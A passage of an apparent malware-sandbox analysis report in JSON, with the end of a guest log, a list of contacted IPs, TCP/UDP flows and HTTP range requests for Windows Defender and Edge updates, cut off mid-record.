100000000\n2025-11-14 04:25:28,838 [root] INFO: Stopping auxiliary module: Evtx\n2025-11-14 04:25:28,838 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Application.evtx to zip dump\n2025-11-14 04:25:28,853 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\HardwareEvents.evtx to zip dump\n2025-11-14 04:25:28,853 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Internet Explorer.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Key Management Service.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Security.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Setup.evtx to zip dump\n2025-11-14 04:25:28,884 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\System.evtx to zip 
dump\n2025-11-14 04:25:28,884 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Windows PowerShell.evtx to zip dump\n2025-11-14 04:25:28,916 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host\n2025-11-14 04:25:28,916 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 32064; Max size: 100000000\n2025-11-14 04:25:28,931 [root] INFO: Stopping auxiliary module: Procmon\n",
"errors": []
}
|
{
"pcap_sha256": "1bd62a01b1b7849f9436395a7f1791f13c4fa2168dea458c04d433ab10ea48ba",
"hosts": [
{
"ip": "52.109.44.110",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "72.153.5.129",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.218.90.51",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "72.153.5.137",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.62.41.126",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.209.193.217",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "135.232.92.34",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "150.171.28.12",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "184.24.98.54",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "199.232.210.172",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.58.95.152",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.58.95.138",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "13.107.246.48",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "20.190.146.38",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "104.91.59.106",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "104.91.59.130",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "14.102.231.204",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.38.50.202",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "52.123.129.14",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "23.212.254.112",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
},
{
"ip": "104.46.162.226",
"country_name": "unknown",
"asn": "",
"asn_name": "",
"hostname": "",
"inaddrarpa": "",
"ports": []
}
],
"domains": [],
"tcp": [
{
"src": "192.168.122.71",
"sport": 49753,
"dst": "104.46.162.226",
"dport": 443,
"offset": 24,
"time": 0
},
{
"src": "192.168.122.71",
"sport": 49746,
"dst": "52.123.129.14",
"dport": 443,
"offset": 1132,
"time": 4.491070032119751
},
{
"src": "192.168.122.71",
"sport": 49683,
"dst": "23.38.50.202",
"dport": 80,
"offset": 1557,
"time": 4.52820897102356
},
{
"src": "192.168.122.71",
"sport": 49755,
"dst": "20.190.146.38",
"dport": 443,
"offset": 5367,
"time": 7.3674890995025635
},
{
"src": "192.168.122.71",
"sport": 49756,
"dst": "20.190.146.38",
"dport": 443,
"offset": 15921,
"time": 7.43644905090332
},
{
"src": "192.168.122.71",
"sport": 49757,
"dst": "14.102.231.204",
"dport": 80,
"offset": 26383,
"time": 7.494611978530884
},
{
"src": "192.168.122.71",
"sport": 49727,
"dst": "13.107.246.48",
"dport": 443,
"offset": 26987,
"time": 7.6508519649505615
},
{
"src": "192.168.122.71",
"sport": 49758,
"dst": "14.102.231.204",
"dport": 80,
"offset": 52358,
"time": 7.837268114089966
},
{
"src": "192.168.122.71",
"sport": 49760,
"dst": "14.102.231.204",
"dport": 80,
"offset": 53994,
"time": 8.243498086929321
},
{
"src": "192.168.122.71",
"sport": 49762,
"dst": "23.58.95.138",
"dport": 80,
"offset": 59188,
"time": 13.471807956695557
},
{
"src": "192.168.122.71",
"sport": 49763,
"dst": "23.58.95.152",
"dport": 80,
"offset": 59834,
"time": 13.473128080368042
},
{
"src": "192.168.122.71",
"sport": 49765,
"dst": "14.102.231.204",
"dport": 80,
"offset": 7588081,
"time": 17.795416116714478
},
{
"src": "192.168.122.71",
"sport": 49766,
"dst": "104.46.162.226",
"dport": 443,
"offset": 30616542,
"time": 30.347222089767456
},
{
"src": "192.168.122.71",
"sport": 49768,
"dst": "104.91.59.130",
"dport": 80,
"offset": 39051602,
"time": 37.27705407142639
},
{
"src": "192.168.122.71",
"sport": 49767,
"dst": "104.91.59.106",
"dport": 80,
"offset": 39052142,
"time": 37.27793502807617
},
{
"src": "192.168.122.71",
"sport": 49769,
"dst": "14.102.231.204",
"dport": 80,
"offset": 40721311,
"time": 37.434438943862915
},
{
"src": "192.168.122.71",
"sport": 49770,
"dst": "14.102.231.204",
"dport": 80,
"offset": 70800176,
"time": 48.20283389091492
},
{
"src": "192.168.122.71",
"sport": 49771,
"dst": "14.102.231.204",
"dport": 80,
"offset": 84535836,
"time": 53.44338893890381
},
{
"src": "192.168.122.71",
"sport": 49772,
"dst": "14.102.231.204",
"dport": 80,
"offset": 89112545,
"time": 55.12815308570862
},
{
"src": "192.168.122.71",
"sport": 49773,
"dst": "14.102.231.204",
"dport": 80,
"offset": 139707645,
"time": 72.32174491882324
},
{
"src": "192.168.122.71",
"sport": 49774,
"dst": "14.102.231.204",
"dport": 80,
"offset": 141093217,
"time": 81.70914793014526
},
{
"src": "192.168.122.71",
"sport": 49775,
"dst": "14.102.231.204",
"dport": 80,
"offset": 142181287,
"time": 91.00901198387146
},
{
"src": "192.168.122.71",
"sport": 49776,
"dst": "14.102.231.204",
"dport": 80,
"offset": 147197757,
"time": 110.9072151184082
},
{
"src": "192.168.122.71",
"sport": 49777,
"dst": "20.190.146.38",
"dport": 443,
"offset": 149613590,
"time": 123.63972806930542
},
{
"src": "192.168.122.71",
"sport": 49778,
"dst": "14.102.231.204",
"dport": 80,
"offset": 151148211,
"time": 130.69043588638306
},
{
"src": "192.168.122.71",
"sport": 49779,
"dst": "14.102.231.204",
"dport": 80,
"offset": 152174494,
"time": 136.72069311141968
},
{
"src": "192.168.122.71",
"sport": 49781,
"dst": "104.91.59.130",
"dport": 80,
"offset": 156003366,
"time": 152.73491406440735
},
{
"src": "192.168.122.71",
"sport": 49780,
"dst": "104.91.59.106",
"dport": 80,
"offset": 156003905,
"time": 152.73606395721436
},
{
"src": "192.168.122.71",
"sport": 49782,
"dst": "20.190.146.38",
"dport": 443,
"offset": 349813338,
"time": 218.62622690200806
},
{
"src": "192.168.122.71",
"sport": 49785,
"dst": "23.212.254.112",
"dport": 443,
"offset": 349850713,
"time": 264.64726090431213
}
],
"udp": [
{
"src": "192.168.122.71",
"sport": 56867,
"dst": "192.168.122.1",
"dport": 53,
"offset": 662,
"time": 3.0554490089416504
},
{
"src": "192.168.122.71",
"sport": 65387,
"dst": "192.168.122.1",
"dport": 53,
"offset": 3983,
"time": 6.602866888046265
},
{
"src": "192.168.122.71",
"sport": 49797,
"dst": "192.168.122.1",
"dport": 53,
"offset": 5026,
"time": 7.157042026519775
},
{
"src": "192.168.122.71",
"sport": 54090,
"dst": "192.168.122.1",
"dport": 53,
"offset": 39691,
"time": 7.692573070526123
},
{
"src": "192.168.122.71",
"sport": 64947,
"dst": "192.168.122.1",
"dport": 53,
"offset": 56193,
"time": 10.951642990112305
},
{
"src": "192.168.122.71",
"sport": 61510,
"dst": "192.168.122.1",
"dport": 53,
"offset": 56598,
"time": 11.110265970230103
},
{
"src": "192.168.122.71",
"sport": 55952,
"dst": "192.168.122.1",
"dport": 53,
"offset": 56923,
"time": 11.498348951339722
},
{
"src": "192.168.122.71",
"sport": 63662,
"dst": "192.168.122.1",
"dport": 53,
"offset": 58139,
"time": 12.508946895599365
},
{
"src": "192.168.122.71",
"sport": 64473,
"dst": "192.168.122.1",
"dport": 53,
"offset": 58241,
"time": 12.51788592338562
},
{
"src": "192.168.122.71",
"sport": 63473,
"dst": "192.168.122.1",
"dport": 53,
"offset": 62344,
"time": 13.548141956329346
},
{
"src": "192.168.122.71",
"sport": 56746,
"dst": "192.168.122.1",
"dport": 53,
"offset": 765416,
"time": 13.637569904327393
},
{
"src": "192.168.122.71",
"sport": 50947,
"dst": "192.168.122.1",
"dport": 53,
"offset": 765517,
"time": 13.659717082977295
},
{
"src": "192.168.122.71",
"sport": 58822,
"dst": "192.168.122.1",
"dport": 53,
"offset": 2845857,
"time": 14.524619102478027
},
{
"src": "192.168.122.71",
"sport": 52657,
"dst": "192.168.122.1",
"dport": 53,
"offset": 3401478,
"time": 15.093657970428467
},
{
"src": "192.168.122.71",
"sport": 54617,
"dst": "192.168.122.1",
"dport": 53,
"offset": 8949939,
"time": 18.6390221118927
},
{
"src": "192.168.122.71",
"sport": 56244,
"dst": "192.168.122.1",
"dport": 53,
"offset": 10064582,
"time": 19.267611980438232
},
{
"src": "192.168.122.71",
"sport": 54876,
"dst": "192.168.122.1",
"dport": 53,
"offset": 10620162,
"time": 19.74019193649292
},
{
"src": "192.168.122.71",
"sport": 51333,
"dst": "192.168.122.1",
"dport": 53,
"offset": 14520556,
"time": 22.265891075134277
},
{
"src": "192.168.122.71",
"sport": 137,
"dst": "192.168.122.1",
"dport": 137,
"offset": 16056492,
"time": 23.001708984375
},
{
"src": "192.168.122.71",
"sport": 56189,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16064164,
"time": 23.002031087875366
},
{
"src": "192.168.122.71",
"sport": 54433,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 16069048,
"time": 23.00248408317566
},
{
"src": "192.168.122.71",
"sport": 56192,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16361069,
"time": 23.032903909683228
},
{
"src": "192.168.122.71",
"sport": 56114,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16373737,
"time": 23.049041032791138
},
{
"src": "192.168.122.71",
"sport": 52775,
"dst": "192.168.122.1",
"dport": 53,
"offset": 16394182,
"time": 23.134582996368408
},
{
"src": "192.168.122.71",
"sport": 53194,
"dst": "192.168.122.1",
"dport": 53,
"offset": 21178748,
"time": 25.5954909324646
},
{
"src": "192.168.122.71",
"sport": 57772,
"dst": "192.168.122.1",
"dport": 53,
"offset": 21178850,
"time": 25.596734046936035
},
{
"src": "192.168.122.71",
"sport": 51419,
"dst": "192.168.122.1",
"dport": 53,
"offset": 24183247,
"time": 27.12466597557068
},
{
"src": "192.168.122.71",
"sport": 62442,
"dst": "192.168.122.1",
"dport": 53,
"offset": 31209879,
"time": 30.688009023666382
},
{
"src": "192.168.122.71",
"sport": 50858,
"dst": "192.168.122.1",
"dport": 53,
"offset": 35515959,
"time": 35.05170011520386
},
{
"src": "192.168.122.71",
"sport": 55639,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 35520860,
"time": 35.127301931381226
},
{
"src": "192.168.122.71",
"sport": 58460,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 35527128,
"time": 35.129010915756226
},
{
"src": "192.168.122.71",
"sport": 138,
"dst": "192.168.122.255",
"dport": 138,
"offset": 47584069,
"time": 39.81338810920715
},
{
"src": "192.168.122.71",
"sport": 49496,
"dst": "192.168.122.1",
"dport": 53,
"offset": 47931370,
"time": 40.124013900756836
},
{
"src": "192.168.122.71",
"sport": 56501,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 47951604,
"time": 40.12581396102905
},
{
"src": "192.168.122.71",
"sport": 61551,
"dst": "192.168.122.1",
"dport": 53,
"offset": 62642136,
"time": 45.24574303627014
},
{
"src": "192.168.122.71",
"sport": 54301,
"dst": "192.168.122.1",
"dport": 53,
"offset": 74291363,
"time": 49.581263065338135
},
{
"src": "192.168.122.71",
"sport": 57288,
"dst": "192.168.122.1",
"dport": 53,
"offset": 74293061,
"time": 49.62503790855408
},
{
"src": "192.168.122.71",
"sport": 54682,
"dst": "192.168.122.1",
"dport": 53,
"offset": 92413270,
"time": 56.26534700393677
},
{
"src": "192.168.122.71",
"sport": 52641,
"dst": "192.168.122.1",
"dport": 53,
"offset": 115778732,
"time": 64.31397795677185
},
{
"src": "192.168.122.71",
"sport": 58786,
"dst": "192.168.122.1",
"dport": 53,
"offset": 128143432,
"time": 68.29185390472412
},
{
"src": "192.168.122.71",
"sport": 53220,
"dst": "192.168.122.1",
"dport": 53,
"offset": 140128745,
"time": 74.57409310340881
},
{
"src": "192.168.122.71",
"sport": 62994,
"dst": "192.168.122.1",
"dport": 53,
"offset": 140590843,
"time": 77.98991203308105
},
{
"src": "192.168.122.71",
"sport": 60100,
"dst": "192.168.122.1",
"dport": 53,
"offset": 140917115,
"time": 80.43291997909546
},
{
"src": "192.168.122.71",
"sport": 52949,
"dst": "192.168.122.1",
"dport": 53,
"offset": 141114134,
"time": 82.03927707672119
},
{
"src": "192.168.122.71",
"sport": 137,
"dst": "192.168.122.255",
"dport": 137,
"offset": 141144319,
"time": 82.47173690795898
},
{
"src": "192.168.122.71",
"sport": 59690,
"dst": "192.168.122.1",
"dport": 53,
"offset": 141319997,
"time": 84.04982709884644
},
{
"src": "192.168.122.71",
"sport": 63872,
"dst": "192.168.122.1",
"dport": 53,
"offset": 141465391,
"time": 85.05850601196289
},
{
"src": "192.168.122.71",
"sport": 49770,
"dst": "192.168.122.1",
"dport": 53,
"offset": 142197292,
"time": 91.09865498542786
},
{
"src": "192.168.122.71",
"sport": 61512,
"dst": "192.168.122.1",
"dport": 53,
"offset": 142422605,
"time": 92.49086308479309
},
{
"src": "192.168.122.71",
"sport": 62896,
"dst": "192.168.122.1",
"dport": 53,
"offset": 144837706,
"time": 101.3786849975586
},
{
"src": "192.168.122.71",
"sport": 53591,
"dst": "192.168.122.1",
"dport": 53,
"offset": 145799130,
"time": 104.537113904953
},
{
"src": "192.168.122.71",
"sport": 61434,
"dst": "192.168.122.1",
"dport": 53,
"offset": 147248496,
"time": 111.3104190826416
},
{
"src": "192.168.122.71",
"sport": 50339,
"dst": "192.168.122.1",
"dport": 53,
"offset": 148230284,
"time": 116.56716299057007
},
{
"src": "192.168.122.71",
"sport": 62573,
"dst": "192.168.122.1",
"dport": 53,
"offset": 151060723,
"time": 130.1927900314331
},
{
"src": "192.168.122.71",
"sport": 64370,
"dst": "192.168.122.1",
"dport": 53,
"offset": 152143138,
"time": 136.22589302062988
},
{
"src": "192.168.122.71",
"sport": 63935,
"dst": "192.168.122.1",
"dport": 53,
"offset": 153067356,
"time": 141.64666199684143
},
{
"src": "192.168.122.71",
"sport": 60214,
"dst": "192.168.122.1",
"dport": 53,
"offset": 154028944,
"time": 144.8700408935547
},
{
"src": "192.168.122.71",
"sport": 58470,
"dst": "192.168.122.1",
"dport": 53,
"offset": 184893358,
"time": 157.7529399394989
},
{
"src": "192.168.122.71",
"sport": 51632,
"dst": "192.168.122.1",
"dport": 53,
"offset": 218950619,
"time": 163.70560789108276
},
{
"src": "192.168.122.71",
"sport": 57049,
"dst": "192.168.122.1",
"dport": 53,
"offset": 255303637,
"time": 169.9826900959015
},
{
"src": "192.168.122.71",
"sport": 56331,
"dst": "192.168.122.1",
"dport": 53,
"offset": 294021176,
"time": 176.679682970047
},
{
"src": "192.168.122.71",
"sport": 52462,
"dst": "224.0.0.252",
"dport": 5355,
"offset": 323613240,
"time": 182.01897406578064
},
{
"src": "192.168.122.71",
"sport": 65416,
"dst": "192.168.122.1",
"dport": 53,
"offset": 334516749,
"time": 183.9507908821106
},
{
"src": "192.168.122.71",
"sport": 55524,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349811084,
"time": 187.79713010787964
},
{
"src": "192.168.122.71",
"sport": 50513,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349811790,
"time": 195.9781939983368
},
{
"src": "192.168.122.71",
"sport": 53348,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349812280,
"time": 209.6638150215149
},
{
"src": "192.168.122.71",
"sport": 52623,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349812624,
"time": 217.55621099472046
},
{
"src": "192.168.122.71",
"sport": 54435,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349817807,
"time": 218.9519259929657
},
{
"src": "192.168.122.71",
"sport": 53028,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349818578,
"time": 229.76046991348267
},
{
"src": "192.168.122.71",
"sport": 60891,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349849635,
"time": 242.131000995636
},
{
"src": "192.168.122.71",
"sport": 59960,
"dst": "192.168.122.1",
"dport": 53,
"offset": 349850065,
"time": 257.5831050872803
}
],
"icmp": [],
"http": [
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=32505856-33554431\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.5\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196465.981339
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=103809024-104333311\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: kjofpJMLf0OQ34afHprSCA.0.2.13.1.1.10\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"body": "",
"path": "/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196466.323995
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=104333312-104857599\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: kjofpJMLf0OQ34afHprSCA.0.2.13.1.1.11\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"body": "",
"path": "/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196466.730225
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=192937984-193986559\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.6\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196476.282143
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=159383552-159907839\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.7\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196484.106943
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=159907840-160432127\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.8\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196489.030389
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=183500800-184025087\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.9\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196495.528199
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.10\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196495.921166
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=191889408-192937983\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.11\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196501.19123
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
